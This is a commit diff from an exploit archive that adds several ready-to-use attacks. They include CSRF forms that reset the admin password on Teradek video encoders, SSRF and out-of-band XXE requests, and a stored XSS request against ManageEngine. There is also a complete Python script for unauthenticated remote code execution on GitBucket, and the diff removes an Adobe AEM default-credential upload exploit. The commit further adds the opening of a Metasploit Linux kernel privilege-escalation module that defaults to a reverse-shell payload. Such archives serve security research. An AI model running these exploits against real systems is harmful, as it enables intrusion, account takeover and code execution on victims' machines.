DB: 2018-05-22
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
This commit is contained in:
parent
42f3759885
commit
08c35595ed
21 changed files with 1240 additions and 58 deletions
53
exploits/hardware/webapps/44671.html
Normal file
53
exploits/hardware/webapps/44671.html
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
<!--
|
||||||
|
|
||||||
|
Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Teradek, LLC
|
||||||
|
Product web page: https://www.teradek.com
|
||||||
|
Affected version: VidiU, VidiU Mini, VidiU Pro
|
||||||
|
3.0.3 (build 32136)
|
||||||
|
3.0.2 (build 31225)
|
||||||
|
2.4.10
|
||||||
|
|
||||||
|
Summary: The Teradek VidiU gives you the freedom to broadcast live
|
||||||
|
high definition video directly to the Web without a PC. Whether you're
|
||||||
|
streaming out of a video switcher or wirelessly from your camera,
|
||||||
|
VidiU allows you to go live when you want, where you want. VidiU
|
||||||
|
offers API level integration with the Ustream, YouTube Live and
|
||||||
|
Livestream platforms, which makes streaming to your channel as
|
||||||
|
easy as logging into your account.
|
||||||
|
|
||||||
|
Desc: The application interface allows users to perform certain
|
||||||
|
actions via HTTP requests without performing any validity checks
|
||||||
|
to verify the requests. This can be exploited to perform certain
|
||||||
|
actions with administrative privileges if a logged-in user visits
|
||||||
|
a malicious web site.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.48
|
||||||
|
lighttpd/1.4.31
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5460
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5460.php
|
||||||
|
|
||||||
|
|
||||||
|
02.03.2018
|
||||||
|
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
|
||||||
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
||||||
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
||||||
|
<input type="hidden" name="user" value="admin" />
|
||||||
|
<input type="submit" value="Initiate" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
118
exploits/hardware/webapps/44672.txt
Normal file
118
exploits/hardware/webapps/44672.txt
Normal file
|
@ -0,0 +1,118 @@
|
||||||
|
Teradek VidiU Pro 3.0.3 SSRF Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Teradek, LLC
|
||||||
|
Product web page: https://www.teradek.com
|
||||||
|
Affected version: VidiU, VidiU Mini, VidiU Pro
|
||||||
|
3.0.3r32136
|
||||||
|
3.0.2r31225
|
||||||
|
2.4.10
|
||||||
|
|
||||||
|
Summary: The Teradek VidiU gives you the freedom to broadcast live
|
||||||
|
high definition video directly to the Web without a PC. Whether you're
|
||||||
|
streaming out of a video switcher or wirelessly from your camera,
|
||||||
|
VidiU allows you to go live when you want, where you want. VidiU
|
||||||
|
offers API level integration with the Ustream, YouTube Live and
|
||||||
|
Livestream platforms, which makes streaming to your channel as
|
||||||
|
easy as logging into your account.
|
||||||
|
|
||||||
|
Desc: A server-side request forgery (SSRF) vulnerability exists in
|
||||||
|
the VidiU management interface within the RTMP settings and the Wowza
|
||||||
|
server mode functionality. The application parses user supplied data
|
||||||
|
in the GET parameters 'url' and 'xml_url' to construct a page request
|
||||||
|
that loads the configuration for specific service. Since no validation
|
||||||
|
is carried out on the parameters, an attacker can specify an external
|
||||||
|
domain and force the application to make a HTTP request to an arbitrary
|
||||||
|
destination host, including xml data parsing (XXE potential). This can
|
||||||
|
be used by an external attacker for example to bypass firewalls and
|
||||||
|
initiate a service and network enumeration on the internal network
|
||||||
|
through the affected application.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.48
|
||||||
|
lighttpd/1.4.31
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5461
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php
|
||||||
|
|
||||||
|
|
||||||
|
02.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
SSRF open port:
|
||||||
|
---------------
|
||||||
|
|
||||||
|
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1
|
||||||
|
Host: 127.0.0.1:8090
|
||||||
|
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json
|
||||||
|
Connection: close
|
||||||
|
Date: Sun, 13 May 2018 21:42:30 GMT
|
||||||
|
Server: lighttpd/1.4.31
|
||||||
|
Content-Length: 31
|
||||||
|
|
||||||
|
{"error":"invalid parameters"}
|
||||||
|
|
||||||
|
|
||||||
|
SSRF closed port:
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1
|
||||||
|
Host: 127.0.0.1:8090
|
||||||
|
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Length: 0
|
||||||
|
Connection: close
|
||||||
|
Date: Sun, 13 May 2018 21:43:30 GMT
|
||||||
|
Server: lighttpd/1.4.31
|
||||||
|
|
||||||
|
|
||||||
|
===================================================
|
||||||
|
|
||||||
|
|
||||||
|
SSRF closed port:
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1
|
||||||
|
Host: 127.0.0.1:8090
|
||||||
|
|
||||||
|
|
||||||
|
{"result":"error", "error":"Curl error"}
|
||||||
|
|
||||||
|
|
||||||
|
SSRF open port:
|
||||||
|
---------------
|
||||||
|
|
||||||
|
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1
|
||||||
|
Host: 127.0.0.1:8090
|
||||||
|
|
||||||
|
|
||||||
|
{"result":"error", "error":"Bad request"}
|
||||||
|
|
||||||
|
|
||||||
|
===================================================
|
||||||
|
|
||||||
|
|
||||||
|
PoC CSRF Blind XXE SSRF OOB:
|
||||||
|
----------------------------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://127.0.0.1:8090/cgi-bin/system.cgi">
|
||||||
|
<input type="hidden" name="command" value="rtmp" />
|
||||||
|
<input type="hidden" name="action" value="rtmp_xml_from_url" />
|
||||||
|
<input type="hidden" name="xml_url" value="http://site.tld/xxe.xml" />
|
||||||
|
<input type="hidden" name="_" value="1526244218671" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
50
exploits/hardware/webapps/44675.html
Normal file
50
exploits/hardware/webapps/44675.html
Normal file
|
@ -0,0 +1,50 @@
|
||||||
|
<!--
|
||||||
|
|
||||||
|
Teradek Cube 7.3.6 CSRF Change Password Exploit
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Teradek, LLC
|
||||||
|
Product web page: https://www.teradek.com
|
||||||
|
Affected version: Firmware Version: 7.3.6 (build 26850)
|
||||||
|
Hardware Version: 1.5
|
||||||
|
Teradek Firmware Version 7.3.15
|
||||||
|
|
||||||
|
|
||||||
|
Summary: Cube packs world-class video quality into a rugged, portable
|
||||||
|
chassis for quick IP video deployments at any location. Each encoder
|
||||||
|
and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
|
||||||
|
and full duplex IFB.
|
||||||
|
|
||||||
|
Desc: The application interface allows users to perform certain actions
|
||||||
|
via HTTP requests without performing any validity checks to verify the
|
||||||
|
requests. This can be exploited to perform certain actions with administrative
|
||||||
|
privileges if a logged-in user visits a malicious web site.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.31
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5464
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
|
||||||
|
|
||||||
|
|
||||||
|
02.03.2018
|
||||||
|
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
|
||||||
|
<input type="hidden" name="command" value="password" />
|
||||||
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
||||||
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
||||||
|
<input type="hidden" name="user" value="admin" />
|
||||||
|
<input type="hidden" name="action" value="Change Password" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
48
exploits/hardware/webapps/44676.html
Normal file
48
exploits/hardware/webapps/44676.html
Normal file
|
@ -0,0 +1,48 @@
|
||||||
|
<!--
|
||||||
|
|
||||||
|
Teradek Slice 7.3.15 CSRF Change Password Exploit
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Teradek, LLC
|
||||||
|
Product web page: https://www.teradek.com
|
||||||
|
Affected version: Firmware Version: 7.3.15 (build 31735)
|
||||||
|
Hardware Version: 2.1
|
||||||
|
|
||||||
|
|
||||||
|
Summary: Built on the award-winning Cube platform, Slice is a rack mount
|
||||||
|
HEVC / H.264 codec designed to fit seamlessly into your broadcast studio.
|
||||||
|
Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O,
|
||||||
|
Ethernet and WiFi connectivity, and full duplex IFB.
|
||||||
|
|
||||||
|
Desc: The application interface allows users to perform certain actions
|
||||||
|
via HTTP requests without performing any validity checks to verify the
|
||||||
|
requests. This can be exploited to perform certain actions with administrative
|
||||||
|
privileges if a logged-in user visits a malicious web site.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.48
|
||||||
|
lighttpd/1.4.31
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5467
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
|
||||||
|
|
||||||
|
|
||||||
|
02.03.2018
|
||||||
|
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
|
||||||
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
||||||
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
||||||
|
<input type="hidden" name="user" value="admin" />
|
||||||
|
<input type="submit" value="Initiate" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
35
exploits/java/webapps/44666.txt
Normal file
35
exploits/java/webapps/44666.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting
|
||||||
|
# Dated: 2018-03-31
|
||||||
|
# Exploit Author: Ahmet GÜREL
|
||||||
|
# Software Link: https://www.manageengine.com/ad-recovery-manager/
|
||||||
|
# Version: < = 5.3 (Build 5330)
|
||||||
|
# Platform: Java
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE: CVE-2018-9163
|
||||||
|
|
||||||
|
# 1. DETAILS
|
||||||
|
# In the Add New Technician (s) section on the /admin/technicians page of the
|
||||||
|
# ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, allows
|
||||||
|
# remote authenticated users with the Login Name parameter is vulnerable to
|
||||||
|
# XSS. The parameters entered are written in the database and affect all
|
||||||
|
# users.
|
||||||
|
|
||||||
|
# 2. PoC:
|
||||||
|
# From the Add New Technician (s) page, it is possible to inject malicious
|
||||||
|
# web code inside Login Name parameter. The HTTP request looks like the following:
|
||||||
|
|
||||||
|
GET
|
||||||
|
/technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22}
|
||||||
|
HTTP/1.1
|
||||||
|
Host: 172.16.219.168:8090
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0)
|
||||||
|
Gecko/20100101 Firefox/59.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://172.16.219.168:8090/
|
||||||
|
Content-Type: application/json; charset=utf-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A;
|
||||||
|
JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D
|
||||||
|
Connection: close
|
171
exploits/java/webapps/44668.py
Executable file
171
exploits/java/webapps/44668.py
Executable file
|
@ -0,0 +1,171 @@
|
||||||
|
# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE
|
||||||
|
# Date: 21-05-2018
|
||||||
|
# Software Link: https://github.com/gitbucket/gitbucket
|
||||||
|
# Exploit Author: Kacper Szurek
|
||||||
|
# Contact: https://twitter.com/KacperSzurek
|
||||||
|
# Website: https://security.szurek.pl/
|
||||||
|
# Category: remote
|
||||||
|
|
||||||
|
1. Description
|
||||||
|
|
||||||
|
Abusing weak secret token and passing insecure parameter to File function.
|
||||||
|
|
||||||
|
2. Proof of Concept
|
||||||
|
|
||||||
|
import os
|
||||||
|
try:
|
||||||
|
from Crypto.Cipher import Blowfish
|
||||||
|
except:
|
||||||
|
print "pip install pycrypto"
|
||||||
|
os._exit(0)
|
||||||
|
|
||||||
|
import binascii
|
||||||
|
import base64
|
||||||
|
import urllib2
|
||||||
|
import urllib
|
||||||
|
import time
|
||||||
|
import sys
|
||||||
|
import pickle
|
||||||
|
|
||||||
|
print "GitBucket 4.23.1 Unauthenticated RCE"
|
||||||
|
print "by Kacper Szurek"
|
||||||
|
print "https://security.szurek.pl/"
|
||||||
|
|
||||||
|
print "Working only when server is installed on Windows"
|
||||||
|
|
||||||
|
def PKCS5Padding(string):
|
||||||
|
byteNum = len(string)
|
||||||
|
packingLength = 8 - byteNum % 8
|
||||||
|
appendage = chr(packingLength) * packingLength
|
||||||
|
return string + appendage
|
||||||
|
|
||||||
|
def encrypt(content, key):
|
||||||
|
content = PKCS5Padding(content)
|
||||||
|
cipher = Blowfish.new(key, Blowfish.MODE_ECB)
|
||||||
|
return base64.b64encode(cipher.encrypt(content))
|
||||||
|
|
||||||
|
def get_file(git_bucket_url, file, key, expiration_time):
|
||||||
|
payload = "{} {}".format(expiration_time, file)
|
||||||
|
authorization = encrypt(payload, key)
|
||||||
|
url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
|
||||||
|
|
||||||
|
try:
|
||||||
|
request = urllib2.Request(url)
|
||||||
|
request.add_header("Authorization", authorization)
|
||||||
|
result = urllib2.urlopen(request).read()
|
||||||
|
return result
|
||||||
|
|
||||||
|
except Exception, e:
|
||||||
|
# If payload is correct and file does not exist, we got error 400
|
||||||
|
if not "Error 500" in e.read():
|
||||||
|
return 'OK'
|
||||||
|
|
||||||
|
def put_file(git_bucket_url, file, key, expiration_time, content):
|
||||||
|
payload = "{} {}".format(expiration_time, file)
|
||||||
|
authorization = encrypt(payload, key)
|
||||||
|
url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
|
||||||
|
|
||||||
|
try:
|
||||||
|
request = urllib2.Request(url, data=content)
|
||||||
|
request.add_header("Authorization", authorization)
|
||||||
|
request.get_method = lambda: 'PUT'
|
||||||
|
result = urllib2.urlopen(request)
|
||||||
|
return result.getcode() == 200
|
||||||
|
|
||||||
|
except Exception, e:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def send_command(git_bucket_url, command):
|
||||||
|
try:
|
||||||
|
result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read()
|
||||||
|
return result
|
||||||
|
except:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def pickle_key(url, key):
|
||||||
|
output = open(pickle_path, "wb")
|
||||||
|
pickle.dump({'url' : url, 'key' : key}, output)
|
||||||
|
output.close()
|
||||||
|
print "[+] Key pickled for futher use"
|
||||||
|
|
||||||
|
|
||||||
|
def unpickle_key(url):
|
||||||
|
if os.path.isfile(pickle_path):
|
||||||
|
pickled_file = open(pickle_path, "rb")
|
||||||
|
data = pickle.load(pickled_file)
|
||||||
|
pickled_file.close()
|
||||||
|
if data['url'] == url:
|
||||||
|
return data['key']
|
||||||
|
return None
|
||||||
|
|
||||||
|
if len(sys.argv) != 3:
|
||||||
|
print "[-] Usage: exploit.py url command"
|
||||||
|
os._exit(0)
|
||||||
|
|
||||||
|
|
||||||
|
exploit_jar = 'exploit.jar'
|
||||||
|
url = sys.argv[1]
|
||||||
|
command = sys.argv[2]
|
||||||
|
pickle_path = 'gitbucket.pickle'
|
||||||
|
|
||||||
|
if url.endswith('/'):
|
||||||
|
url = url[0:-1]
|
||||||
|
|
||||||
|
try:
|
||||||
|
is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read()
|
||||||
|
except:
|
||||||
|
is_gitbucket = ""
|
||||||
|
|
||||||
|
if not is_gitbucket.startswith('{"rate_limit_url"'):
|
||||||
|
print "[-] Probably not gitbucket url: {}".format(url)
|
||||||
|
os._exit(0)
|
||||||
|
|
||||||
|
if not os.path.isfile(exploit_jar):
|
||||||
|
print "[-] Missing exploit file: {}".format(exploit_jar)
|
||||||
|
os._exit(0)
|
||||||
|
|
||||||
|
expiration_time = int(round(time.time() * 1000))+(1000*6000)
|
||||||
|
print "[+] Set expire time to: {}".format(expiration_time)
|
||||||
|
|
||||||
|
print "[+] Start search blowfish key: "
|
||||||
|
for i in range(0, 10000):
|
||||||
|
if i % 100 == 0:
|
||||||
|
print "+",
|
||||||
|
|
||||||
|
potential_key = unpickle_key(url)
|
||||||
|
if potential_key:
|
||||||
|
print "\n[+] Unpickle key, try it"
|
||||||
|
else:
|
||||||
|
potential_key = str(i).zfill(4)
|
||||||
|
|
||||||
|
config_path = "non_existing_file"
|
||||||
|
config_content = get_file(url, config_path, potential_key, expiration_time)
|
||||||
|
if config_content:
|
||||||
|
print "\n[+] Found blowfish key: {}".format(potential_key)
|
||||||
|
print "[+] Config content:\n{}".format(config_content)
|
||||||
|
|
||||||
|
exploit_path = "..\..\..\..\plugins\exploit.jar"
|
||||||
|
f = open(exploit_jar, "rb")
|
||||||
|
exploit_content = f.read()
|
||||||
|
f.close()
|
||||||
|
if put_file(url, exploit_path, potential_key, expiration_time, exploit_content):
|
||||||
|
print "[+] Wait few second for plugin load"
|
||||||
|
time.sleep(5)
|
||||||
|
command_content = send_command(url, "cmd /c {}".format(command))
|
||||||
|
|
||||||
|
if command_content:
|
||||||
|
pickle_key(url, potential_key)
|
||||||
|
print command_content
|
||||||
|
else:
|
||||||
|
print "[-] Cannot execute command"
|
||||||
|
|
||||||
|
else:
|
||||||
|
print "[-] Cannot upload exploit.jar"
|
||||||
|
|
||||||
|
os._exit(0)
|
||||||
|
|
||||||
|
3. Solution:
|
||||||
|
|
||||||
|
Update to version 4.24.1
|
||||||
|
|
||||||
|
https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war
|
|
@ -1,56 +0,0 @@
|
||||||
# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
|
|
||||||
# Date: 5/19/18
|
|
||||||
# Exploit Author: StaticFlow
|
|
||||||
# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
|
|
||||||
# Version: < 6.3
|
|
||||||
import requests
|
|
||||||
import sys
|
|
||||||
|
|
||||||
baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
|
|
||||||
credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
|
|
||||||
exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line
|
|
||||||
|
|
||||||
def testLogins():
|
|
||||||
for credential in credentialList:
|
|
||||||
response = requests.get(baseUrl, auth=(credential[0], credential[1]))
|
|
||||||
if(response.status_code == 200):
|
|
||||||
return credential
|
|
||||||
return False
|
|
||||||
|
|
||||||
if len(sys.argv) == 2:
|
|
||||||
baseUrl = sys.argv[1]
|
|
||||||
if len(sys.argv) == 3:
|
|
||||||
exploit = sys.argv[2]
|
|
||||||
|
|
||||||
gotCreds = testLogins()
|
|
||||||
if(gotCreds):
|
|
||||||
attackChain = [
|
|
||||||
{
|
|
||||||
'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
|
|
||||||
},
|
|
||||||
{
|
|
||||||
'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
|
|
||||||
},
|
|
||||||
{
|
|
||||||
':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
|
|
||||||
':dest': (None, '/apps/rcetype')
|
|
||||||
},
|
|
||||||
{
|
|
||||||
'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
|
|
||||||
}
|
|
||||||
]
|
|
||||||
print "creating folder structure and uploading exploit"
|
|
||||||
for attack in attackChain[:-1]:
|
|
||||||
response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
|
|
||||||
if response.status_code > 201:
|
|
||||||
print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
|
|
||||||
print response.content
|
|
||||||
sys.exit(0)
|
|
||||||
|
|
||||||
print "initializing servlet from exploit"
|
|
||||||
response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
|
|
||||||
if response.status_code > 201:
|
|
||||||
print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
|
|
||||||
print response.content
|
|
||||||
sys.exit(0)
|
|
||||||
print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')
|
|
187
exploits/linux/local/44677.rb
Executable file
187
exploits/linux/local/44677.rb
Executable file
|
@ -0,0 +1,187 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Local
|
||||||
|
Rank = GreatRanking
|
||||||
|
|
||||||
|
include Msf::Post::File
|
||||||
|
include Msf::Post::Linux::Priv
|
||||||
|
include Msf::Post::Linux::System
|
||||||
|
include Msf::Post::Linux::Kernel
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::FileDropper
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a vulnerability in the rds_page_copy_user function
|
||||||
|
in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
|
||||||
|
to execute code as root (CVE-2010-3904).
|
||||||
|
|
||||||
|
This module has been tested successfully on Fedora 13 (i686) with
|
||||||
|
kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
|
||||||
|
with kernel version 2.6.32-21-generic.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Dan Rosenberg', # Discovery and C exploit
|
||||||
|
'Brendan Coles' # Metasploit
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Oct 20 2010',
|
||||||
|
'Platform' => [ 'linux' ],
|
||||||
|
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||||
|
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||||
|
'Targets' => [[ 'Auto', {} ]],
|
||||||
|
'Privileged' => true,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'AKA', 'rds-fail.c' ],
|
||||||
|
[ 'EDB', '15285' ],
|
||||||
|
[ 'CVE', '2010-3904' ],
|
||||||
|
[ 'BID', '44219' ],
|
||||||
|
[ 'URL', 'https://securitytracker.com/id?1024613' ],
|
||||||
|
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],
|
||||||
|
[ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],
|
||||||
|
[ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],
|
||||||
|
[ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
|
||||||
|
'WfsDelay' => 10,
|
||||||
|
'PrependFork' => true
|
||||||
|
},
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options [
|
||||||
|
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
|
||||||
|
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def base_dir
|
||||||
|
datastore['WritableDir'].to_s
|
||||||
|
end
|
||||||
|
|
||||||
|
def modules_disabled?
|
||||||
|
modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
|
||||||
|
(modules_disabled.eql?('1') || modules_disabled.eql?('2'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload(path, data)
|
||||||
|
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||||
|
rm_f path
|
||||||
|
write_file path, data
|
||||||
|
register_file_for_cleanup path
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_and_chmodx(path, data)
|
||||||
|
upload path, data
|
||||||
|
cmd_exec "chmod +x '#{path}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_and_compile(path, data)
|
||||||
|
upload "#{path}.c", data
|
||||||
|
output = cmd_exec "gcc -o #{path} #{path}.c"
|
||||||
|
|
||||||
|
unless output.blank?
|
||||||
|
print_error output
|
||||||
|
fail_with Failure::Unknown, "#{path}.c failed to compile"
|
||||||
|
end
|
||||||
|
|
||||||
|
cmd_exec "chmod +x #{path}"
|
||||||
|
register_file_for_cleanup path
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit_data(file)
|
||||||
|
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
|
||||||
|
fd = ::File.open path, 'rb'
|
||||||
|
data = fd.read fd.stat.size
|
||||||
|
fd.close
|
||||||
|
data
|
||||||
|
end
|
||||||
|
|
||||||
|
def live_compile?
|
||||||
|
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
|
||||||
|
|
||||||
|
if has_gcc?
|
||||||
|
vprint_good 'gcc is installed'
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
|
||||||
|
unless datastore['COMPILE'].eql? 'Auto'
|
||||||
|
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
version = kernel_release
|
||||||
|
unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&
|
||||||
|
Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')
|
||||||
|
vprint_error "Linux kernel version #{version} is not vulnerable"
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
